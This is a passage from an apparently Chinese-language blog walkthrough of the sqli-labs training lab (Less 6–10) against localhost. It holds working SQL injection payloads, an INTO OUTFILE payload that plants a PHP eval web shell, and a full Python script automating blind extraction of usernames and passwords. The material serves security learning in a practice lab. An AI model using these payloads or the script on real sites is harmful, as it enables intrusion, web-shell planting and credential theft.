<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-6/?id=1" union <span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="number">1</span>, <span class="keyword">concat</span>((<span class="keyword">select</span> <span class="keyword">concat_ws</span>(<span class="built_in">char</span>(<span class="number">32</span>,<span class="number">44</span>,<span class="number">32</span>),<span class="keyword">id</span>,username,<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>), <span class="keyword">floor</span>(<span class="keyword">rand</span>()*<span class="number">2</span>)) <span class="keyword">as</span> a <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> a <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/25.png" alt="picture 25"></p>
<h1 id="less-7-GET-Dump-into-outfile-String-（导出文件GET字符型注入）"><a href="#less-7-GET-Dump-into-outfile-String-（导出文件GET字符型注入）" class="headerlink" title="less 7 GET - Dump into outfile - String （导出文件GET字符型注入）"></a>less 7 GET - Dump into outfile - String （导出文件GET字符型注入）</h1><p>导出到文件就是可以将查询结果导出到一个文件中，如常见的将一句话木马导出到一个php文件中，sqlmap中也有导出一句话和一个文件上传的页面</p>
<p>常用的语句是：<strong>select “<code>&lt;?php @eval($_POST[&#39;_&#39;]);?&gt;</code>“ into outfile “XXX\test.php”</strong> ，当这里要获取到网站的在系统中的具体路径（绝对路径）</p>
<p>之后便构造payload：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-7/?id=1')) union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="string">'&lt;?php @eval($_POST["_"]);?&gt;'</span> <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">"C:\\phpStudy\\WWW\\sqli-labs-master\\ttt.php"</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/26.png" alt="picture 26"></p>
<p>虽然回显报错，但是查看本地文件已经写入了ttt.php，接下来中国菜刀即可</p>
<p><img src="/2019/02/28/sqli-labs/27.png" alt="picture 27"></p>
<h1 id="less-8-GET-Blind-Boolian-Based-Single-Quotes-布尔型单引号GET盲注"><a href="#less-8-GET-Blind-Boolian-Based-Single-Quotes-布尔型单引号GET盲注" class="headerlink" title="less 8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)"></a>less 8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)</h1><p>布尔型盲注，单引号，id=1回显，价格单引号不回显，构造一下验证是不是布尔型?id=1’ and 1=1 –+ 回显了，证明没跑</p>
<p><img src="/2019/02/28/sqli-labs/28.png" alt="picture 28"></p>
<p>首先select database()查询数据库</p>
<p>ascii(substr((select database()),1,1))：返回数据库名称的第一个字母,转化为ascii码</p>
<p>ascii(substr((select database()),1,1))&gt;64：ascii大于64就返回true，if就返回1，否则返回0</p>
<p>因此，构造payload为：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-8/?id=1' and ascii(substr((<span class="keyword">select</span> <span class="keyword">database</span>()),<span class="number">1</span>,<span class="number">1</span>))&gt;<span class="number">64</span> %<span class="number">23</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/29.png" alt="picture 29"></p>
<p>猜数据库名第一个字母具体过程，使用二分法</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs -master/Less-8/?id=1' and ascii(substr((<span class="keyword">select</span> <span class="keyword">database</span>()),<span class="number">1</span>,<span class="number">1</span>)&gt;<span class="number">64</span> %<span class="number">23</span> 返回正确，大于<span class="number">64</span></span><br><span class="line"><span class="keyword">http</span>://localhost/sqli-labs -<span class="keyword">master</span>/<span class="keyword">Less</span><span class="number">-8</span>/?<span class="keyword">id</span>=<span class="number">1</span><span class="string">' and ascii(substr((select database()),1,1))&gt;96 %23 返回正确，大于96</span></span><br><span class="line"><span class="string">http://localhost/sqli-labs -master/Less-8/?id=1'</span> <span class="keyword">and</span> <span class="keyword">ascii</span>(<span class="keyword">substr</span>((<span class="keyword">select</span> <span class="keyword">database</span>()),<span class="number">1</span>,<span class="number">1</span>))&lt;<span class="number">123</span> %<span class="number">23</span> 返回正确，小于<span class="number">123</span> ，区间在<span class="number">97</span><span class="number">-122</span></span><br><span class="line"><span class="keyword">http</span>://localhost/sqli-labs -<span class="keyword">master</span>/<span class="keyword">Less</span><span class="number">-8</span>/?<span class="keyword">id</span>=<span class="number">1</span><span class="string">' and ascii(substr((select database()),1,1))&gt;109 %23 返回正确，大于109，区间在110-122</span></span><br><span class="line"><span class="string">http://localhost/sqli-labs -master/Less-8/?id=1'</span> <span class="keyword">and</span> <span class="keyword">ascii</span>(<span class="keyword">substr</span>((<span class="keyword">select</span> <span class="keyword">database</span>()),<span class="number">1</span>,<span class="number">1</span>))&gt;<span class="number">116</span> %<span class="number">23</span> 返回错误，所以在<span class="number">110</span><span class="number">-116</span>之间</span><br><span class="line"><span class="keyword">http</span>://localhost/sqli-labs -<span class="keyword">master</span>/<span class="keyword">Less</span><span class="number">-8</span>/?<span class="keyword">id</span>=<span class="number">1</span><span class="string">' and ascii(substr((select database()),1,1))&gt;112 %23 返回正确，大于112，区间在113-116之间</span></span><br><span class="line"><span class="string">http://localhost/sqli-labs -master/Less-8/?id=1'</span> <span class="keyword">and</span> <span class="keyword">ascii</span>(<span class="keyword">substr</span>((<span class="keyword">select</span> <span class="keyword">database</span>()),<span class="number">1</span>,<span class="number">1</span>))&gt;<span class="number">114</span> %<span class="number">23</span> 返回正确，大于<span class="number">114</span>，间在<span class="number">115</span><span class="number">-116</span>之间</span><br><span class="line"><span class="keyword">http</span>://localhost/sqli-labs -<span class="keyword">master</span>/<span class="keyword">Less</span><span class="number">-8</span>/?<span class="keyword">id</span>=<span class="number">1</span><span class="string">' and ascii(substr((select database()),1,1))&gt;115 %23 返回错误，不大于115，即第一个字母的ascii为115，即字母s</span></span><br></pre></td></tr></table></figure>
<p>盲注过程是漫长的，一般是自己写脚本或使用工具辅助，写脚本之前要知道原理，上面的就是原理</p>
<p>下面基于这个写了个提取users表数据的完整脚本，当然也可以用sqlmap跑一下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"> </span><br><span class="line">url = <span class="string">"http://localhost/sqli-labs-master/Less-8/?id=1"</span></span><br><span class="line">success_text = <span class="string">"You are in..........."</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">#定义相应的SQL注入语句</span></span><br><span class="line">ascii_fuzz = <span class="string">"' and ascii(substr((%s),%d,1))&gt;=%d #"</span></span><br><span class="line">length_fuzz = <span class="string">"' and length(%s) &gt;= %d #"</span></span><br><span class="line">DB_fuzz = <span class="string">"select database()"</span></span><br><span class="line">table_fuzz = <span class="string">"select table_name from information_schema.tables where table_schema='%s' limit %d,1"</span></span><br><span class="line">column_fuzz = <span class="string">"select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %d,1"</span></span><br><span class="line">data_fuzz = <span class="string">"select %s from %s limit %d,1"</span></span><br><span class="line"> </span><br><span class="line">tablecount_fuzz = <span class="string">"' and (select count(table_name) from information_schema.tables where table_schema='%s')&gt;=%d #"</span></span><br><span class="line">columncount_fuzz1 = <span class="string">"' and (select count(column_name) from information_schema.columns where table_schema='"</span></span><br><span class="line">columncount_fuzz2 = <span class="string">"' and table_name='%s')&gt;=%d #"</span></span><br><span class="line">datacount_fuzz = <span class="string">"' and (select count(*) from %s)&gt;=%d #"</span></span><br><span class="line"> </span><br><span class="line">tablelength_fuzz1 = <span class="string">"'and (select length(table_name) from information_schema.tables where table_schema='%s' limit "</span></span><br><span class="line">tablelength_fuzz2 = <span class="string">",1)&gt;=%d #"</span></span><br><span class="line">columnlength_fuzz1 = <span class="string">"' and (select length(column_name) from information_schema.columns where table_schema='"</span></span><br><span class="line">columnlength_fuzz2 = <span class="string">"' and table_name='%s' limit "</span></span><br><span class="line">columnlength_fuzz3 = <span class="string">",1)&gt;=%d #"</span></span><br><span class="line">datalength_fuzz1 = <span class="string">"' and (select length("</span></span><br><span class="line">datalength_fuzz2 = <span class="string">") from %s limit "</span></span><br><span class="line">datalength_fuzz3 = <span class="string">",1)&gt;=%d #"</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">#SQL盲注测试函数</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Bind_SQL_Fuzz</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="comment">#获取数据库名的长度</span></span><br><span class="line">	DBnamelength = getLength(length_fuzz,<span class="string">"database()"</span>)</span><br><span class="line">	DBname = getName(ascii_fuzz,DB_fuzz,DBnamelength)</span><br><span class="line">	<span class="keyword">print</span> <span class="string">"[*] The database is: "</span> + DBname</span><br><span class="line">	<span class="keyword">print</span></span><br><span class="line"> </span><br><span class="line">	<span class="comment">#获取表的数量</span></span><br><span class="line">	tablecount = getLength(tablecount_fuzz,DBname)</span><br><span class="line">	<span class="keyword">print</span> <span class="string">"[*] The count of tables is: "</span> + str(tablecount)</span><br><span class="line"> </span><br><span class="line">	<span class="comment">#获取各个表名</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">0</span>,tablecount):</span><br><span class="line">		tablelength_fuzz_new = tablelength_fuzz1 + str(i) + tablelength_fuzz2</span><br><span class="line">		tablelength = getLength(tablelength_fuzz_new,DBname)</span><br><span class="line">		tname = getName(ascii_fuzz,table_fuzz%(DBname,i),tablelength)</span><br><span class="line">		<span class="keyword">print</span> <span class="string">'[Table Name] '</span> + tname</span><br><span class="line">	<span class="keyword">print</span></span><br><span class="line"> </span><br><span class="line">	<span class="comment">#获取users表的列数</span></span><br><span class="line">	columncount_fuzz_new = columncount_fuzz1 + DBname + columncount_fuzz2</span><br><span class="line">	columncount = getLength(columncount_fuzz_new,<span class="string">"users"</span>)</span><br><span class="line">	<span class="keyword">print</span> <span class="string">"[*] (Table: users) The count of columns is: "</span> + str(columncount)</span><br><span class="line"> </span><br><span class="line">	<span class="comment">#定义两个数组分别用于存储列名和列中对应的信息</span></span><br><span class="line">	col = []</span><br><span class="line">	Datas = []</span><br><span class="line"> </span><br><span class="line">	<span class="comment">#获取数据一共有多少列</span></span><br><span class="line">	datacount = getLength(datacount_fuzz,<span class="string">"users"</span>)</span><br><span class="line"> </span><br><span class="line">	<span class="comment">#获取users表的列名</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">0</span>,columncount):</span><br><span class="line">		columnlength_fuzz_new = columnlength_fuzz1 + DBname + columnlength_fuzz2 + str(i) + columnlength_fuzz3</span><br><span class="line">		columnlength = getLength(columnlength_fuzz_new,<span class="string">"users"</span>)</span><br><span class="line">		cname = getName(ascii_fuzz,column_fuzz%(DBname,<span class="string">"users"</span>,i),columnlength)</span><br><span class="line">		<span class="keyword">print</span> <span class="string">"[Column Name] (Table: users) "</span> + cname</span><br><span class="line">		col.append(cname)</span><br><span class="line"> </span><br><span class="line">		<span class="comment">#获取列名对应的数据信息</span></span><br><span class="line">		datas = []</span><br><span class="line">		<span class="keyword">for</span> x <span class="keyword">in</span> xrange(<span class="number">0</span>,datacount):</span><br><span class="line">			datalength_fuzz_new = datalength_fuzz1 + cname + datalength_fuzz2 + str(x) + datalength_fuzz3</span><br><span class="line">			datalength = getLength(datalength_fuzz_new,<span class="string">"users"</span>)</span><br><span class="line">			data = getName(ascii_fuzz,data_fuzz%(cname,<span class="string">"users"</span>,x),datalength)</span><br><span class="line">			datas.append(data)</span><br><span class="line">		Datas.append(datas)</span><br><span class="line"> </span><br><span class="line">	<span class="keyword">print</span></span><br><span class="line"> </span><br><span class="line">	<span class="keyword">print</span> <span class="string">"[*] (Table: users) The count of data is: "</span> + str(datacount)</span><br><span class="line">	<span class="keyword">print</span></span><br><span class="line">	<span class="keyword">print</span> <span class="string">"[*] The data of users: "</span></span><br><span class="line"> </span><br><span class="line">	<span class="comment">#输出列名</span></span><br><span class="line">	colname = <span class="string">""</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(col)):</span><br><span class="line">		<span class="keyword">if</span> i == <span class="number">0</span>:</span><br><span class="line">			colname += col[i]</span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			colname += <span class="string">"	"</span> + col[i]</span><br><span class="line">	<span class="keyword">print</span> colname</span><br><span class="line"> </span><br><span class="line">	<span class="comment">#输出users表中的具体信息</span></span><br><span class="line">	show = <span class="string">""</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">0</span>,datacount):</span><br><span class="line">		show = <span class="string">"%-8s%-16s%-16s"</span></span><br><span class="line">		<span class="keyword">print</span> show%(Datas[<span class="number">0</span>][i],Datas[<span class="number">1</span>][i],Datas[<span class="number">2</span>][i])</span><br><span class="line"> </span><br><span class="line"><span class="comment">#获取字段的长度</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getLength</span><span class="params">(text,string)</span>:</span></span><br><span class="line">	left = <span class="number">0</span></span><br><span class="line">	right = <span class="number">0</span></span><br><span class="line">	guess = <span class="number">10</span></span><br><span class="line"> </span><br><span class="line">	<span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">		<span class="comment">#如果返回为真，那么guess加5直至返回为假时确定右边界</span></span><br><span class="line">		<span class="keyword">if</span> Check1(text,string,guess) == <span class="literal">True</span>:</span><br><span class="line">			guess += <span class="number">5</span></span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			right = guess</span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line"> </span><br><span class="line">	<span class="comment">#二分查找法</span></span><br><span class="line">	mid = (left + right) / <span class="number">2</span></span><br><span class="line">	<span class="keyword">while</span> left &lt; right - <span class="number">1</span>:</span><br><span class="line">		<span class="keyword">if</span>  Check1(text,string,mid) == <span class="literal">True</span>:</span><br><span class="line">			left = mid</span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			right = mid</span><br><span class="line">		mid = (left + right) / <span class="number">2</span></span><br><span class="line"> </span><br><span class="line">	<span class="keyword">return</span> left</span><br><span class="line"> </span><br><span class="line"><span class="comment">#检测请求SQL注入的URL是否注入成功</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Check1</span><span class="params">(text,string,length)</span>:</span></span><br><span class="line"> </span><br><span class="line">	newurl = url + urllib.quote(text % (string,length))</span><br><span class="line">	result = urllib.urlopen(newurl)</span><br><span class="line"> </span><br><span class="line">	<span class="keyword">if</span> success_text <span class="keyword">in</span> result.read():</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">#与check1类似，但接收的参数值数量不同</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Check2</span><span class="params">(text,string,position,num)</span>:</span></span><br><span class="line"> </span><br><span class="line">	newurl = url + urllib.quote(text % (string,position,num))</span><br><span class="line">	result = urllib.urlopen(newurl)</span><br><span class="line"> </span><br><span class="line">	<span class="keyword">if</span> success_text <span class="keyword">in</span> result.read():</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">#获取相应字段的名称</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getName</span><span class="params">(text,string,length)</span>:</span></span><br><span class="line"> </span><br><span class="line">	name = <span class="string">''</span></span><br><span class="line"> </span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">1</span>,length+<span class="number">1</span>):</span><br><span class="line"> </span><br><span class="line">		<span class="comment">#32是空格，为第一个可显示的字符，127是delete，即最后一个可显示的字符</span></span><br><span class="line">		left = <span class="number">32</span></span><br><span class="line">		right = <span class="number">127</span></span><br><span class="line"> </span><br><span class="line">		<span class="comment">#二分查找法</span></span><br><span class="line">		mid = (left + right) / <span class="number">2</span></span><br><span class="line">		<span class="keyword">while</span> left &lt; right - <span class="number">1</span>:</span><br><span class="line">			<span class="keyword">if</span> Check2(text,string,i,mid) == <span class="literal">True</span>:</span><br><span class="line">				left = mid</span><br><span class="line">				mid = (left + right) / <span class="number">2</span></span><br><span class="line">			<span class="keyword">else</span>:</span><br><span class="line">				right = mid</span><br><span class="line">			mid = (left + right) / <span class="number">2</span></span><br><span class="line">		name += chr(left)</span><br><span class="line"> </span><br><span class="line">	<span class="keyword">return</span> name</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">	Bind_SQL_Fuzz()</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">	main()</span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/30.png" alt="picture 30"></p>
<h1 id="less-9-GET-Blind-Time-based-Single-Quotes-基于时间的GET单引号盲注"><a href="#less-9-GET-Blind-Time-based-Single-Quotes-基于时间的GET单引号盲注" class="headerlink" title="less 9 GET - Blind - Time based. -  Single Quotes  (基于时间的GET单引号盲注)"></a>less 9 GET - Blind - Time based. -  Single Quotes  (基于时间的GET单引号盲注)</h1><p>不管怎么输入，回显总是you are …<br>考虑时间型盲注，payload:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-9/?id=1' and sleep(3) <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>发现明显延迟，说明注入成功，接下来爆破就完了</p>
<p>爆表名</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-9/?id=1' and if(ascii(substr(database(),1,1))&gt;115, 0, sleep(5)) --+</span><br></pre></td></tr></table></figure>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-9/?id=1' and if(ascii(substr(database(),1,1))&gt;114, 0, sleep(5)) --+</span><br></pre></td></tr></table></figure>
<p>判断数据库名的第一个字母为s（ascii为115），判断错误的话是暂停5秒</p>
<p>那么这里为什么必须基于时间呢，因为你怎么输入，输出结果都是You are in ，这就必须通过时间来判断了</p>
<p>原理和方法和上面类似。</p>
<h1 id="less10-GET-Blind-Time-based-double-quotes-基于时间的双引号盲注"><a href="#less10-GET-Blind-Time-based-double-quotes-基于时间的双引号盲注" class="headerlink" title="less10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)"></a>less10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)</h1><p>基于时间的双引号盲注，只要把上一题Less-9的单引号改成双引号，一样的注入</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/01/xss-games/" rel="prev" title="xss games">
                xss games <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Shang</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#基础知识"><span class="nav-number">1.</span> <span class="nav-text">基础知识</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-注入思路"><span class="nav-number">1.1.</span> <span class="nav-text">sql 注入思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-注入类型（基于错误）"><span class="nav-number">1.2.</span> <span class="nav-text">sql 注入类型（基于错误）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-注入的基本步骤"><span class="nav-number">1.3.</span> <span class="nav-text">sql 注入的基本步骤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MYSQL-数据库"><span class="nav-number">1.4.</span> <span class="nav-text">MYSQL 数据库</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#常用函数"><span class="nav-number">1.5.</span> <span class="nav-text">常用函数</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Less-1-GET-Error-based-Single-quotes-String-基于错误的GET单引号字符型注入"><span class="nav-number">2.</span> <span class="nav-text">Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#less-2-GET-Error-based-Intiger-based-基于错误的GET整型注入"><span class="nav-number">3.</span> <span class="nav-text">less 2 GET - Error based - Intiger based (基于错误的GET整型注入)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#less-3-GET-Error-based-Single-quotes-with-twist-string-基于错误的GET单引号变形字符型注入"><span class="nav-number">4.</span> <span class="nav-text">less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#less-4-GET-Error-based-Double-Quotes-String-（基于错误的GET双引号字符型注入）"><span class="nav-number">5.</span> <span class="nav-text">less 4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#less-5-GET-Double-Injection-Single-Quotes-String-双注入GET单引号字符型注入"><span class="nav-number">6.</span> <span class="nav-text">less 5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#方法一：时间延迟型手工注入："><span class="nav-number">6.1.</span> <span class="nav-text">方法一：时间延迟型手工注入：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#方法二，双注入"><span class="nav-number">6.2.</span> <span class="nav-text">方法二，双注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#less-6-GET-Double-Injection-Double-Quotes-String-双注入GET双引号字符型注入"><span class="nav-number">6.3.</span> <span class="nav-text">less 6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#less-7-GET-Dump-into-outfile-String-（导出文件GET字符型注入）"><span class="nav-number">7.</span> <span class="nav-text">less 7 GET - Dump into outfile - String （导出文件GET字符型注入）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#less-8-GET-Blind-Boolian-Based-Single-Quotes-布尔型单引号GET盲注"><span class="nav-number">8.</span> <span class="nav-text">less 8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#less-9-GET-Blind-Time-based-Single-Quotes-基于时间的GET单引号盲注"><span class="nav-number">9.</span> <span class="nav-text">less 9 GET - Blind - Time based. -  Single Quotes  (基于时间的GET单引号盲注)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#less10-GET-Blind-Time-based-double-quotes-基于时间的双引号盲注"><span class="nav-number">10.</span> <span class="nav-text">less10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Shang</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
